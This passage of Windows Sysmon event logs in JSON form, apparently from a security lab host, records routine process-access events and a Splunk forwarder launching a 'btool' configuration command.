C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.525","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2921,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.525\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.525","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2922,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.541\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0236-5F25-0000-0010CE040500}\r\nTargetProcessId: 1176\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.541","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0236-5F25-0000-0010CE040500}","TargetProcessId":"1176","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2923,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.775\r\nSourceProcessGUID: {A837DB8D-0236-5F25-0000-0010CE040500}\r\nSourceProcessId: 1176\r\nSourceThreadId: 1180\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.775","SourceProcessGUID":"{A837DB8D-0236-5F25-0000-0010CE040500}","SourceProcessId":"1176","SourceThreadId":"1180","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","TargetProcessId":"3088","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2924,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.812\r\nProcessGuid: {A837DB8D-0236-5F25-0000-0010A0070500}\r\nProcessId: 1256\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list kvstore --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-0236-5F25-0000-0010B8FD0400}\r\nParentProcessId: 4932\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\" restart --waitonpid=3088","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.812","ProcessGuid":"{A837DB8D-0236-5F25-0000-0010A0070500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list kvstore --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-0236-5F25-0000-0010B8FD0400}","ParentProcessId":"4932","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\" restart --waitonpid=3088","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2925,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.807\r\nSourceProcessGUID: {A837DB8D-0236-5F25-0000-0010B8FD0400}\r\nSourceProcessId: 4932\r\nSourceThreadId: 4940\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\r\nTargetProcessGUID: {A837DB8D-0236-5F25-0000-0010A0070500}\r\nTargetProcessId: 1256\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+14ab4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+d8a0|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.807","SourceProcessGUID":"{A837DB8D-0236-5F25-0000-0010B8FD0400}","SourceProcessId":"4932","SourceThreadId":"4940","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE","TargetProcessGUID":"{A837DB8D-0236-5F25-0000-0010A0070500}","TargetProcessId":"1256","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+14ab4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+d8a0|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2926,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.807\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0236-5F25-0000-0010A0070500}\r\nTargetProcessId: 1256\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.807","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0236-5F25-0000-0010A0070500}","TargetProcessId":"1256","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2927,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.807\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.807","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2928,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.807\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.807","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2929,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.807\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 